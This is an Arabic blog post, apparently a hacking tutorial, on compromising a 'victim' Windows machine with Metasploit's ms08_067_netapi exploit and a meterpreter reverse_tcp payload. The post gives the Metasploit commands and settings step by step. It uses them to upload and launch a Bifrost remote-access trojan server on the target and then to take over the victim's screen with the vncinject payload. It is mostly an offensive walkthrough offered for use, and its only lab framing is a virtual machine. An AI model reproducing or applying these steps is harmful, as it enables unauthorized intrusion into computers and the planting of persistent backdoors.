إختراق الضحية بالميتا ورفع سيرفر بيفروست

التسميات:

السلام عليكم و رحمة الله و بركاته وأنا أفكر طرأت لي فكرة لا أعرف إن كانت طرحت بعد المهم هي إختراق الضحية بالميتا ورفع سيرفر بيفروست هي المعلومة مش جديدة بس معلومة للي ما يعرفها وكما 
سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject وسأجربها علي جهاز إفتراضي كفانا من الكلام ولنبدأ.http://img194.imageshack.us/img194/9891/20090702183620.pngإضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploitshttp://img27.imageshack.us/img27/5264/exploitscmd3.pngونختار windows/smb/ms08_067_netapi show payloadshttp://img25.imageshack.us/img25/3329/payloads.pngونختار windows/meterpreter/reverse_tcpأو نختارها مباشرة كما ف الصورةhttp://img16.imageshack.us/img16/7027/setexploit5.pngوالآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101ولا تنسي أن تضع رقم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enterhttp://img139.imageshack.us/img139/4131/launchexploit6.pngكما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445  لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\ كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلدC:\Program Files\****sploit\Framework3http://img200.imageshack.us/img200/998/uploadserver6.png************************************************** ***********************بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:use -m processexecute -f cmd.exe -cinteract 3كما في الصورة حسب رقم channel أو session المفتوحhttp://img37.imageshack.us/img37/6270/73006251.pngلتشغيل السيرفر start server.exe************************************************** ************************وكما توضح الصورة نجاح تحميل السيرفرhttp://img213.imageshack.us/img213/9439/70700213.pngوالصور تعبر عن نفسها http://img190.imageshack.us/img190/6250/30769969.pngشاشة الضحيةhttp://img197.imageshack.us/img197/482/55987753.pngلتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال windows/meterpreter/smb/ms08_067_netapiset windows/vncinject/reverse_tcpبتطبيق الثغرة ستفتح لنا الشاشة التاليةhttp://img269.imageshack.us/img269/1700/11vncinject.pngو بكده نقدر نقول تم بحمد الله


هل أعجبك الموضوع ؟
التعليقات
0 التعليقات

ليست هناك تعليقات:

إرسال تعليق

جميع الحقوق محفوظة ©2012-2013 | ، نقل بدون تصريح ممنوع . Privacy-Policy| أنضم ألى فريق التدوين

traget='_blank'>